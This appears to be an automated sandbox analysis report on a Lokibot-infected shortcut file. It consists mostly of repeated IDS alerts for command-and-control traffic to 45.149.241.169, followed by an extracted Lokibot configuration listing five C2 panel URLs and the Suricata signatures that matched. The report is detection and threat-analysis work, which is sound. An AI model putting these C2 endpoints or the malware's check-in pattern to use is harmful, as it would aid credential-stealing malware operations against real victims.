                2024-10-03T09:21:45.677355+020020243181Malware Command and Control Activity Detected192.168.2.104975745.149.241.16980TCP
                2024-10-03T09:21:46.484782+020020243181Malware Command and Control Activity Detected192.168.2.104975845.149.241.16980TCP
                2024-10-03T09:21:47.380324+020020243181Malware Command and Control Activity Detected192.168.2.104975945.149.241.16980TCP
                2024-10-03T09:21:48.314653+020020243181Malware Command and Control Activity Detected192.168.2.104976045.149.241.16980TCP
                2024-10-03T09:21:49.257250+020020243181Malware Command and Control Activity Detected192.168.2.104976145.149.241.16980TCP
                2024-10-03T09:21:51.015102+020020243181Malware Command and Control Activity Detected192.168.2.104976245.149.241.16980TCP
                2024-10-03T09:21:51.932714+020020243181Malware Command and Control Activity Detected192.168.2.104976345.149.241.16980TCP
                2024-10-03T09:21:52.836195+020020243181Malware Command and Control Activity Detected192.168.2.104976445.149.241.16980TCP
                2024-10-03T09:21:53.876769+020020243181Malware Command and Control Activity Detected192.168.2.104976545.149.241.16980TCP
                2024-10-03T09:21:54.813087+020020243181Malware Command and Control Activity Detected192.168.2.104976645.149.241.16980TCP
                2024-10-03T09:21:55.759857+020020243181Malware Command and Control Activity Detected192.168.2.104976745.149.241.16980TCP
                2024-10-03T09:21:57.049364+020020243181Malware Command and Control Activity Detected192.168.2.104976845.149.241.16980TCP
                2024-10-03T09:21:58.038305+020020243181Malware Command and Control Activity Detected192.168.2.104976945.149.241.16980TCP
                2024-10-03T09:21:59.153854+020020243181Malware Command and Control Activity Detected192.168.2.104977045.149.241.16980TCP
                2024-10-03T09:22:00.071903+020020243181Malware Command and Control Activity Detected192.168.2.104977145.149.241.16980TCP
                2024-10-03T09:22:01.204157+020020243181Malware Command and Control Activity Detected192.168.2.104977245.149.241.16980TCP
                2024-10-03T09:22:02.272358+020020243181Malware Command and Control Activity Detected192.168.2.104977345.149.241.16980TCP
                2024-10-03T09:22:03.139465+020020243181Malware Command and Control Activity Detected192.168.2.104977445.149.241.16980TCP
                2024-10-03T09:22:08.044529+020020243181Malware Command and Control Activity Detected192.168.2.104977545.149.241.16980TCP
                2024-10-03T09:22:09.292301+020020243181Malware Command and Control Activity Detected192.168.2.104977645.149.241.16980TCP
                2024-10-03T09:22:10.319663+020020243181Malware Command and Control Activity Detected192.168.2.104977745.149.241.16980TCP
                2024-10-03T09:22:11.228003+020020243181Malware Command and Control Activity Detected192.168.2.104977845.149.241.16980TCP
                2024-10-03T09:22:12.130536+020020243181Malware Command and Control Activity Detected192.168.2.104977945.149.241.16980TCP
                2024-10-03T09:22:13.083005+020020243181Malware Command and Control Activity Detected192.168.2.104978045.149.241.16980TCP
                2024-10-03T09:22:14.029913+020020243181Malware Command and Control Activity Detected192.168.2.104978145.149.241.16980TCP
                2024-10-03T09:22:15.259916+020020243181Malware Command and Control Activity Detected192.168.2.104978245.149.241.16980TCP
                2024-10-03T09:22:16.293625+020020243181Malware Command and Control Activity Detected192.168.2.104978345.149.241.16980TCP
                2024-10-03T09:22:18.382621+020020243181Malware Command and Control Activity Detected192.168.2.104978445.149.241.16980TCP
                2024-10-03T09:22:19.163958+020020243181Malware Command and Control Activity Detected192.168.2.104978545.149.241.16980TCP
                2024-10-03T09:22:19.984520+020020243181Malware Command and Control Activity Detected192.168.2.104978645.149.241.16980TCP
                2024-10-03T09:22:20.837934+020020243181Malware Command and Control Activity Detected192.168.2.104978745.149.241.16980TCP
                2024-10-03T09:22:21.745606+020020243181Malware Command and Control Activity Detected192.168.2.104978845.149.241.16980TCP
                2024-10-03T09:22:22.564890+020020243181Malware Command and Control Activity Detected192.168.2.104978945.149.241.16980TCP
                2024-10-03T09:22:23.426654+020020243181Malware Command and Control Activity Detected192.168.2.104979045.149.241.16980TCP
                2024-10-03T09:22:24.372920+020020243181Malware Command and Control Activity Detected192.168.2.104979145.149.241.16980TCP
                2024-10-03T09:22:25.207193+020020243181Malware Command and Control Activity Detected192.168.2.104979245.149.241.16980TCP
                2024-10-03T09:22:26.051444+020020243181Malware Command and Control Activity Detected192.168.2.104979345.149.241.16980TCP
                2024-10-03T09:22:26.870939+020020243181Malware Command and Control Activity Detected192.168.2.104979445.149.241.16980TCP
                2024-10-03T09:22:27.946191+020020243181Malware Command and Control Activity Detected192.168.2.104979545.149.241.16980TCP
                2024-10-03T09:22:28.768533+020020243181Malware Command and Control Activity Detected192.168.2.104979645.149.241.16980TCP
                2024-10-03T09:22:29.580351+020020243181Malware Command and Control Activity Detected192.168.2.104979745.149.241.16980TCP
                2024-10-03T09:22:30.494085+020020243181Malware Command and Control Activity Detected192.168.2.104979845.149.241.16980TCP
                2024-10-03T09:22:31.469550+020020243181Malware Command and Control Activity Detected192.168.2.104979945.149.241.16980TCP
                2024-10-03T09:22:32.287998+020020243181Malware Command and Control Activity Detected192.168.2.104980045.149.241.16980TCP
                2024-10-03T09:22:33.477823+020020243181Malware Command and Control Activity Detected192.168.2.104980145.149.241.16980TCP
                2024-10-03T09:22:34.400049+020020243181Malware Command and Control Activity Detected192.168.2.104980245.149.241.16980TCP
                2024-10-03T09:22:35.266278+020020243181Malware Command and Control Activity Detected192.168.2.104980345.149.241.16980TCP
                2024-10-03T09:22:36.047866+020020243181Malware Command and Control Activity Detected192.168.2.104980445.149.241.16980TCP
                2024-10-03T09:22:36.840524+020020243181Malware Command and Control Activity Detected192.168.2.104980545.149.241.16980TCP
                2024-10-03T09:22:37.716251+020020243181Malware Command and Control Activity Detected192.168.2.104980645.149.241.16980TCP
                2024-10-03T09:22:40.207040+020020243181Malware Command and Control Activity Detected192.168.2.104980745.149.241.16980TCP
                2024-10-03T09:22:41.026370+020020243181Malware Command and Control Activity Detected192.168.2.104980845.149.241.16980TCP
                2024-10-03T09:22:41.948130+020020243181Malware Command and Control Activity Detected192.168.2.104980945.149.241.16980TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-03T09:20:46.743247+020020216411A Network Trojan was detected192.168.2.104970745.149.241.16980TCP
                2024-10-03T09:20:47.692236+020020216411A Network Trojan was detected192.168.2.104970845.149.241.16980TCP
                2024-10-03T09:20:48.567976+020020216411A Network Trojan was detected192.168.2.104970945.149.241.16980TCP
                2024-10-03T09:20:56.608552+020020216411A Network Trojan was detected192.168.2.104971545.149.241.16980TCP
                2024-10-03T09:20:58.316279+020020216411A Network Trojan was detected192.168.2.104971645.149.241.16980TCP
                2024-10-03T09:20:59.297568+020020216411A Network Trojan was detected192.168.2.104971745.149.241.16980TCP
                2024-10-03T09:21:00.494707+020020216411A Network Trojan was detected192.168.2.104971845.149.241.16980TCP
                2024-10-03T09:21:01.777716+020020216411A Network Trojan was detected192.168.2.104971945.149.241.16980TCP
                2024-10-03T09:21:03.684048+020020216411A Network Trojan was detected192.168.2.104972045.149.241.16980TCP
                2024-10-03T09:21:04.600648+020020216411A Network Trojan was detected192.168.2.104972145.149.241.16980TCP
                2024-10-03T09:21:05.528198+020020216411A Network Trojan was detected192.168.2.104972245.149.241.16980TCP
                2024-10-03T09:21:06.423848+020020216411A Network Trojan was detected192.168.2.104972345.149.241.16980TCP
                2024-10-03T09:21:07.339146+020020216411A Network Trojan was detected192.168.2.104972445.149.241.16980TCP
                2024-10-03T09:21:08.254833+020020216411A Network Trojan was detected192.168.2.104972545.149.241.16980TCP
                2024-10-03T09:21:09.163793+020020216411A Network Trojan was detected192.168.2.104972645.149.241.16980TCP
                2024-10-03T09:21:10.038728+020020216411A Network Trojan was detected192.168.2.104972745.149.241.16980TCP
                2024-10-03T09:21:11.038525+020020216411A Network Trojan was detected192.168.2.104972845.149.241.16980TCP
                2024-10-03T09:21:12.097651+020020216411A Network Trojan was detected192.168.2.104972945.149.241.16980TCP
                2024-10-03T09:21:13.053982+020020216411A Network Trojan was detected192.168.2.104973045.149.241.16980TCP
                2024-10-03T09:21:13.963379+020020216411A Network Trojan was detected192.168.2.104973145.149.241.16980TCP
                2024-10-03T09:21:14.812196+020020216411A Network Trojan was detected192.168.2.104973245.149.241.16980TCP
                2024-10-03T09:21:15.631002+020020216411A Network Trojan was detected192.168.2.104973345.149.241.16980TCP
                2024-10-03T09:21:17.618667+020020216411A Network Trojan was detected192.168.2.104973445.149.241.16980TCP
                2024-10-03T09:21:18.848565+020020216411A Network Trojan was detected192.168.2.104973545.149.241.16980TCP
                2024-10-03T09:21:20.073300+020020216411A Network Trojan was detected192.168.2.104973645.149.241.16980TCP
                2024-10-03T09:21:20.894549+020020216411A Network Trojan was detected192.168.2.104973745.149.241.16980TCP
                2024-10-03T09:21:21.709486+020020216411A Network Trojan was detected192.168.2.104973845.149.241.16980TCP
                2024-10-03T09:21:22.731827+020020216411A Network Trojan was detected192.168.2.104973945.149.241.16980TCP
                2024-10-03T09:21:23.541526+020020216411A Network Trojan was detected192.168.2.104974045.149.241.16980TCP
                2024-10-03T09:21:24.429751+020020216411A Network Trojan was detected192.168.2.104974145.149.241.16980TCP
                2024-10-03T09:21:25.256730+020020216411A Network Trojan was detected192.168.2.104974245.149.241.16980TCP
                2024-10-03T09:21:26.118736+020020216411A Network Trojan was detected192.168.2.104974345.149.241.16980TCP
                2024-10-03T09:21:26.897709+020020216411A Network Trojan was detected192.168.2.104974445.149.241.16980TCP
                2024-10-03T09:21:27.873598+020020216411A Network Trojan was detected192.168.2.104974545.149.241.16980TCP
                2024-10-03T09:21:28.712017+020020216411A Network Trojan was detected192.168.2.104974645.149.241.16980TCP
                2024-10-03T09:21:29.654591+020020216411A Network Trojan was detected192.168.2.104974745.149.241.16980TCP
                2024-10-03T09:21:30.592777+020020216411A Network Trojan was detected192.168.2.104974945.149.241.16980TCP
                2024-10-03T09:21:32.603612+020020216411A Network Trojan was detected192.168.2.104975045.149.241.16980TCP
                2024-10-03T09:21:33.526238+020020216411A Network Trojan was detected192.168.2.104975145.149.241.16980TCP
                2024-10-03T09:21:35.225314+020020216411A Network Trojan was detected192.168.2.104975245.149.241.16980TCP
                2024-10-03T09:21:37.121380+020020216411A Network Trojan was detected192.168.2.104975345.149.241.16980TCP
                2024-10-03T09:21:42.317761+020020216411A Network Trojan was detected192.168.2.104975445.149.241.16980TCP
                2024-10-03T09:21:43.182438+020020216411A Network Trojan was detected192.168.2.104975545.149.241.16980TCP
                2024-10-03T09:21:44.019040+020020216411A Network Trojan was detected192.168.2.104975645.149.241.16980TCP
                2024-10-03T09:21:44.999700+020020216411A Network Trojan was detected192.168.2.104975745.149.241.16980TCP
                2024-10-03T09:21:45.841003+020020216411A Network Trojan was detected192.168.2.104975845.149.241.16980TCP
                2024-10-03T09:21:46.640569+020020216411A Network Trojan was detected192.168.2.104975945.149.241.16980TCP
                2024-10-03T09:21:47.539146+020020216411A Network Trojan was detected192.168.2.104976045.149.241.16980TCP
                2024-10-03T09:21:48.485570+020020216411A Network Trojan was detected192.168.2.104976145.149.241.16980TCP
                2024-10-03T09:21:50.351787+020020216411A Network Trojan was detected192.168.2.104976245.149.241.16980TCP
                2024-10-03T09:21:51.167462+020020216411A Network Trojan was detected192.168.2.104976345.149.241.16980TCP
                2024-10-03T09:21:52.087418+020020216411A Network Trojan was detected192.168.2.104976445.149.241.16980TCP
                2024-10-03T09:21:52.996562+020020216411A Network Trojan was detected192.168.2.104976545.149.241.16980TCP
                2024-10-03T09:21:54.039701+020020216411A Network Trojan was detected192.168.2.104976645.149.241.16980TCP
                2024-10-03T09:21:54.984252+020020216411A Network Trojan was detected192.168.2.104976745.149.241.16980TCP
                2024-10-03T09:21:55.928869+020020216411A Network Trojan was detected192.168.2.104976845.149.241.16980TCP
                2024-10-03T09:21:57.209847+020020216411A Network Trojan was detected192.168.2.104976945.149.241.16980TCP
                2024-10-03T09:21:58.212197+020020216411A Network Trojan was detected192.168.2.104977045.149.241.16980TCP
                2024-10-03T09:21:59.314369+020020216411A Network Trojan was detected192.168.2.104977145.149.241.16980TCP
                2024-10-03T09:22:00.225165+020020216411A Network Trojan was detected192.168.2.104977245.149.241.16980TCP
                2024-10-03T09:22:01.533864+020020216411A Network Trojan was detected192.168.2.104977345.149.241.16980TCP
                2024-10-03T09:22:02.438719+020020216411A Network Trojan was detected192.168.2.104977445.149.241.16980TCP
                2024-10-03T09:22:03.295902+020020216411A Network Trojan was detected192.168.2.104977545.149.241.16980TCP
                2024-10-03T09:22:08.197130+020020216411A Network Trojan was detected192.168.2.104977645.149.241.16980TCP
                2024-10-03T09:22:09.449762+020020216411A Network Trojan was detected192.168.2.104977745.149.241.16980TCP
                2024-10-03T09:22:10.502964+020020216411A Network Trojan was detected192.168.2.104977845.149.241.16980TCP
                2024-10-03T09:22:11.390993+020020216411A Network Trojan was detected192.168.2.104977945.149.241.16980TCP
                2024-10-03T09:22:12.289773+020020216411A Network Trojan was detected192.168.2.104978045.149.241.16980TCP
                2024-10-03T09:22:13.260240+020020216411A Network Trojan was detected192.168.2.104978145.149.241.16980TCP
                2024-10-03T09:22:14.183320+020020216411A Network Trojan was detected192.168.2.104978245.149.241.16980TCP
                2024-10-03T09:22:15.428230+020020216411A Network Trojan was detected192.168.2.104978345.149.241.16980TCP
                2024-10-03T09:22:16.459230+020020216411A Network Trojan was detected192.168.2.104978445.149.241.16980TCP
                2024-10-03T09:22:18.541296+020020216411A Network Trojan was detected192.168.2.104978545.149.241.16980TCP
                2024-10-03T09:22:19.323391+020020216411A Network Trojan was detected192.168.2.104978645.149.241.16980TCP
                2024-10-03T09:22:20.145363+020020216411A Network Trojan was detected192.168.2.104978745.149.241.16980TCP
                2024-10-03T09:22:20.992218+020020216411A Network Trojan was detected192.168.2.104978845.149.241.16980TCP
                2024-10-03T09:22:21.900606+020020216411A Network Trojan was detected192.168.2.104978945.149.241.16980TCP
                2024-10-03T09:22:22.731444+020020216411A Network Trojan was detected192.168.2.104979045.149.241.16980TCP
                2024-10-03T09:22:23.590474+020020216411A Network Trojan was detected192.168.2.104979145.149.241.16980TCP
                2024-10-03T09:22:24.518060+020020216411A Network Trojan was detected192.168.2.104979245.149.241.16980TCP
                2024-10-03T09:22:25.368288+020020216411A Network Trojan was detected192.168.2.104979345.149.241.16980TCP
                2024-10-03T09:22:26.207258+020020216411A Network Trojan was detected192.168.2.104979445.149.241.16980TCP
                2024-10-03T09:22:27.022466+020020216411A Network Trojan was detected192.168.2.104979545.149.241.16980TCP
                2024-10-03T09:22:28.117331+020020216411A Network Trojan was detected192.168.2.104979645.149.241.16980TCP
                2024-10-03T09:22:28.927858+020020216411A Network Trojan was detected192.168.2.104979745.149.241.16980TCP
                2024-10-03T09:22:29.746973+020020216411A Network Trojan was detected192.168.2.104979845.149.241.16980TCP
                2024-10-03T09:22:30.654397+020020216411A Network Trojan was detected192.168.2.104979945.149.241.16980TCP
                2024-10-03T09:22:31.633256+020020216411A Network Trojan was detected192.168.2.104980045.149.241.16980TCP
                2024-10-03T09:22:32.759509+020020216411A Network Trojan was detected192.168.2.104980145.149.241.16980TCP
                2024-10-03T09:22:33.636826+020020216411A Network Trojan was detected192.168.2.104980245.149.241.16980TCP
                2024-10-03T09:22:34.567446+020020216411A Network Trojan was detected192.168.2.104980345.149.241.16980TCP
                2024-10-03T09:22:35.412082+020020216411A Network Trojan was detected192.168.2.104980445.149.241.16980TCP
                2024-10-03T09:22:36.196016+020020216411A Network Trojan was detected192.168.2.104980545.149.241.16980TCP
                2024-10-03T09:22:36.999089+020020216411A Network Trojan was detected192.168.2.104980645.149.241.16980TCP
                2024-10-03T09:22:37.869567+020020216411A Network Trojan was detected192.168.2.104980745.149.241.16980TCP
                2024-10-03T09:22:40.386731+020020216411A Network Trojan was detected192.168.2.104980845.149.241.16980TCP
                2024-10-03T09:22:41.280593+020020216411A Network Trojan was detected192.168.2.104980945.149.241.16980TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-03T09:20:46.743247+020028257661Malware Command and Control Activity Detected192.168.2.104970745.149.241.16980TCP
                2024-10-03T09:20:47.692236+020028257661Malware Command and Control Activity Detected192.168.2.104970845.149.241.16980TCP
                2024-10-03T09:20:48.567976+020028257661Malware Command and Control Activity Detected192.168.2.104970945.149.241.16980TCP
                2024-10-03T09:20:56.608552+020028257661Malware Command and Control Activity Detected192.168.2.104971545.149.241.16980TCP
                2024-10-03T09:20:58.316279+020028257661Malware Command and Control Activity Detected192.168.2.104971645.149.241.16980TCP
                2024-10-03T09:20:59.297568+020028257661Malware Command and Control Activity Detected192.168.2.104971745.149.241.16980TCP
                2024-10-03T09:21:00.494707+020028257661Malware Command and Control Activity Detected192.168.2.104971845.149.241.16980TCP
                2024-10-03T09:21:01.777716+020028257661Malware Command and Control Activity Detected192.168.2.104971945.149.241.16980TCP
                2024-10-03T09:21:03.684048+020028257661Malware Command and Control Activity Detected192.168.2.104972045.149.241.16980TCP
                2024-10-03T09:21:04.600648+020028257661Malware Command and Control Activity Detected192.168.2.104972145.149.241.16980TCP
                2024-10-03T09:21:05.528198+020028257661Malware Command and Control Activity Detected192.168.2.104972245.149.241.16980TCP
                2024-10-03T09:21:06.423848+020028257661Malware Command and Control Activity Detected192.168.2.104972345.149.241.16980TCP
                2024-10-03T09:21:07.339146+020028257661Malware Command and Control Activity Detected192.168.2.104972445.149.241.16980TCP
                2024-10-03T09:21:08.254833+020028257661Malware Command and Control Activity Detected192.168.2.104972545.149.241.16980TCP
                2024-10-03T09:21:09.163793+020028257661Malware Command and Control Activity Detected192.168.2.104972645.149.241.16980TCP
                2024-10-03T09:21:10.038728+020028257661Malware Command and Control Activity Detected192.168.2.104972745.149.241.16980TCP
                2024-10-03T09:21:11.038525+020028257661Malware Command and Control Activity Detected192.168.2.104972845.149.241.16980TCP
                2024-10-03T09:21:12.097651+020028257661Malware Command and Control Activity Detected192.168.2.104972945.149.241.16980TCP
                2024-10-03T09:21:13.053982+020028257661Malware Command and Control Activity Detected192.168.2.104973045.149.241.16980TCP
                2024-10-03T09:21:13.963379+020028257661Malware Command and Control Activity Detected192.168.2.104973145.149.241.16980TCP
                2024-10-03T09:21:14.812196+020028257661Malware Command and Control Activity Detected192.168.2.104973245.149.241.16980TCP
                2024-10-03T09:21:15.631002+020028257661Malware Command and Control Activity Detected192.168.2.104973345.149.241.16980TCP
                2024-10-03T09:21:17.618667+020028257661Malware Command and Control Activity Detected192.168.2.104973445.149.241.16980TCP
                2024-10-03T09:21:18.848565+020028257661Malware Command and Control Activity Detected192.168.2.104973545.149.241.16980TCP
                2024-10-03T09:21:20.073300+020028257661Malware Command and Control Activity Detected192.168.2.104973645.149.241.16980TCP
                2024-10-03T09:21:20.894549+020028257661Malware Command and Control Activity Detected192.168.2.104973745.149.241.16980TCP
                2024-10-03T09:21:21.709486+020028257661Malware Command and Control Activity Detected192.168.2.104973845.149.241.16980TCP
                2024-10-03T09:21:22.731827+020028257661Malware Command and Control Activity Detected192.168.2.104973945.149.241.16980TCP
                2024-10-03T09:21:23.541526+020028257661Malware Command and Control Activity Detected192.168.2.104974045.149.241.16980TCP
                2024-10-03T09:21:24.429751+020028257661Malware Command and Control Activity Detected192.168.2.104974145.149.241.16980TCP
                2024-10-03T09:21:25.256730+020028257661Malware Command and Control Activity Detected192.168.2.104974245.149.241.16980TCP
                2024-10-03T09:21:26.118736+020028257661Malware Command and Control Activity Detected192.168.2.104974345.149.241.16980TCP
                2024-10-03T09:21:26.897709+020028257661Malware Command and Control Activity Detected192.168.2.104974445.149.241.16980TCP
                2024-10-03T09:21:27.873598+020028257661Malware Command and Control Activity Detected192.168.2.104974545.149.241.16980TCP
                2024-10-03T09:21:28.712017+020028257661Malware Command and Control Activity Detected192.168.2.104974645.149.241.16980TCP
                2024-10-03T09:21:29.654591+020028257661Malware Command and Control Activity Detected192.168.2.104974745.149.241.16980TCP
                2024-10-03T09:21:30.592777+020028257661Malware Command and Control Activity Detected192.168.2.104974945.149.241.16980TCP
                2024-10-03T09:21:32.603612+020028257661Malware Command and Control Activity Detected192.168.2.104975045.149.241.16980TCP
                2024-10-03T09:21:33.526238+020028257661Malware Command and Control Activity Detected192.168.2.104975145.149.241.16980TCP
                2024-10-03T09:21:35.225314+020028257661Malware Command and Control Activity Detected192.168.2.104975245.149.241.16980TCP
                2024-10-03T09:21:37.121380+020028257661Malware Command and Control Activity Detected192.168.2.104975345.149.241.16980TCP
                2024-10-03T09:21:42.317761+020028257661Malware Command and Control Activity Detected192.168.2.104975445.149.241.16980TCP
                2024-10-03T09:21:43.182438+020028257661Malware Command and Control Activity Detected192.168.2.104975545.149.241.16980TCP
                2024-10-03T09:21:44.019040+020028257661Malware Command and Control Activity Detected192.168.2.104975645.149.241.16980TCP
                2024-10-03T09:21:44.999700+020028257661Malware Command and Control Activity Detected192.168.2.104975745.149.241.16980TCP
                2024-10-03T09:21:45.841003+020028257661Malware Command and Control Activity Detected192.168.2.104975845.149.241.16980TCP
                2024-10-03T09:21:46.640569+020028257661Malware Command and Control Activity Detected192.168.2.104975945.149.241.16980TCP
                2024-10-03T09:21:47.539146+020028257661Malware Command and Control Activity Detected192.168.2.104976045.149.241.16980TCP
                2024-10-03T09:21:48.485570+020028257661Malware Command and Control Activity Detected192.168.2.104976145.149.241.16980TCP
                2024-10-03T09:21:50.351787+020028257661Malware Command and Control Activity Detected192.168.2.104976245.149.241.16980TCP
                2024-10-03T09:21:51.167462+020028257661Malware Command and Control Activity Detected192.168.2.104976345.149.241.16980TCP
                2024-10-03T09:21:52.087418+020028257661Malware Command and Control Activity Detected192.168.2.104976445.149.241.16980TCP
                2024-10-03T09:21:52.996562+020028257661Malware Command and Control Activity Detected192.168.2.104976545.149.241.16980TCP
                2024-10-03T09:21:54.039701+020028257661Malware Command and Control Activity Detected192.168.2.104976645.149.241.16980TCP
                2024-10-03T09:21:54.984252+020028257661Malware Command and Control Activity Detected192.168.2.104976745.149.241.16980TCP
                2024-10-03T09:21:55.928869+020028257661Malware Command and Control Activity Detected192.168.2.104976845.149.241.16980TCP
                2024-10-03T09:21:57.209847+020028257661Malware Command and Control Activity Detected192.168.2.104976945.149.241.16980TCP
                2024-10-03T09:21:58.212197+020028257661Malware Command and Control Activity Detected192.168.2.104977045.149.241.16980TCP
                2024-10-03T09:21:59.314369+020028257661Malware Command and Control Activity Detected192.168.2.104977145.149.241.16980TCP
                2024-10-03T09:22:00.225165+020028257661Malware Command and Control Activity Detected192.168.2.104977245.149.241.16980TCP
                2024-10-03T09:22:01.533864+020028257661Malware Command and Control Activity Detected192.168.2.104977345.149.241.16980TCP
                2024-10-03T09:22:02.438719+020028257661Malware Command and Control Activity Detected192.168.2.104977445.149.241.16980TCP
                2024-10-03T09:22:03.295902+020028257661Malware Command and Control Activity Detected192.168.2.104977545.149.241.16980TCP
                2024-10-03T09:22:08.197130+020028257661Malware Command and Control Activity Detected192.168.2.104977645.149.241.16980TCP
                2024-10-03T09:22:09.449762+020028257661Malware Command and Control Activity Detected192.168.2.104977745.149.241.16980TCP
                2024-10-03T09:22:10.502964+020028257661Malware Command and Control Activity Detected192.168.2.104977845.149.241.16980TCP
                2024-10-03T09:22:11.390993+020028257661Malware Command and Control Activity Detected192.168.2.104977945.149.241.16980TCP
                2024-10-03T09:22:12.289773+020028257661Malware Command and Control Activity Detected192.168.2.104978045.149.241.16980TCP
                2024-10-03T09:22:13.260240+020028257661Malware Command and Control Activity Detected192.168.2.104978145.149.241.16980TCP
                2024-10-03T09:22:14.183320+020028257661Malware Command and Control Activity Detected192.168.2.104978245.149.241.16980TCP
                2024-10-03T09:22:15.428230+020028257661Malware Command and Control Activity Detected192.168.2.104978345.149.241.16980TCP
                2024-10-03T09:22:16.459230+020028257661Malware Command and Control Activity Detected192.168.2.104978445.149.241.16980TCP
                2024-10-03T09:22:18.541296+020028257661Malware Command and Control Activity Detected192.168.2.104978545.149.241.16980TCP
                2024-10-03T09:22:19.323391+020028257661Malware Command and Control Activity Detected192.168.2.104978645.149.241.16980TCP
                2024-10-03T09:22:20.145363+020028257661Malware Command and Control Activity Detected192.168.2.104978745.149.241.16980TCP
                2024-10-03T09:22:20.992218+020028257661Malware Command and Control Activity Detected192.168.2.104978845.149.241.16980TCP
                2024-10-03T09:22:21.900606+020028257661Malware Command and Control Activity Detected192.168.2.104978945.149.241.16980TCP
                2024-10-03T09:22:22.731444+020028257661Malware Command and Control Activity Detected192.168.2.104979045.149.241.16980TCP
                2024-10-03T09:22:23.590474+020028257661Malware Command and Control Activity Detected192.168.2.104979145.149.241.16980TCP
                2024-10-03T09:22:24.518060+020028257661Malware Command and Control Activity Detected192.168.2.104979245.149.241.16980TCP
                2024-10-03T09:22:25.368288+020028257661Malware Command and Control Activity Detected192.168.2.104979345.149.241.16980TCP
                2024-10-03T09:22:26.207258+020028257661Malware Command and Control Activity Detected192.168.2.104979445.149.241.16980TCP
                2024-10-03T09:22:27.022466+020028257661Malware Command and Control Activity Detected192.168.2.104979545.149.241.16980TCP
                2024-10-03T09:22:28.117331+020028257661Malware Command and Control Activity Detected192.168.2.104979645.149.241.16980TCP
                2024-10-03T09:22:28.927858+020028257661Malware Command and Control Activity Detected192.168.2.104979745.149.241.16980TCP
                2024-10-03T09:22:29.746973+020028257661Malware Command and Control Activity Detected192.168.2.104979845.149.241.16980TCP
                2024-10-03T09:22:30.654397+020028257661Malware Command and Control Activity Detected192.168.2.104979945.149.241.16980TCP
                2024-10-03T09:22:31.633256+020028257661Malware Command and Control Activity Detected192.168.2.104980045.149.241.16980TCP
                2024-10-03T09:22:32.759509+020028257661Malware Command and Control Activity Detected192.168.2.104980145.149.241.16980TCP
                2024-10-03T09:22:33.636826+020028257661Malware Command and Control Activity Detected192.168.2.104980245.149.241.16980TCP
                2024-10-03T09:22:34.567446+020028257661Malware Command and Control Activity Detected192.168.2.104980345.149.241.16980TCP
                2024-10-03T09:22:35.412082+020028257661Malware Command and Control Activity Detected192.168.2.104980445.149.241.16980TCP
                2024-10-03T09:22:36.196016+020028257661Malware Command and Control Activity Detected192.168.2.104980545.149.241.16980TCP
                2024-10-03T09:22:36.999089+020028257661Malware Command and Control Activity Detected192.168.2.104980645.149.241.16980TCP
                2024-10-03T09:22:37.869567+020028257661Malware Command and Control Activity Detected192.168.2.104980745.149.241.16980TCP
                2024-10-03T09:22:40.386731+020028257661Malware Command and Control Activity Detected192.168.2.104980845.149.241.16980TCP
                2024-10-03T09:22:41.280593+020028257661Malware Command and Control Activity Detected192.168.2.104980945.149.241.16980TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://freighteighttwocam.ddns.net/mdifygidj/five/fre.php"]}
                Source: Comprobante.lnk.lnkReversingLabs: Detection: 42%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\Desktop\screens.pifJoe Sandbox ML: detected
                Source: Comprobante.lnk.lnkJoe Sandbox ML: detected
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49706 version: TLS 1.2
                Source: C:\Users\user\Desktop\screens.pifCode function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,5_2_00403D74

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49707 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49707 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49707 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49718 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49718 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49718 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49726 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49727 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49727 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49727 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49726 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49756 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49756 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49756 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49726 -> 45.149.241.169:80
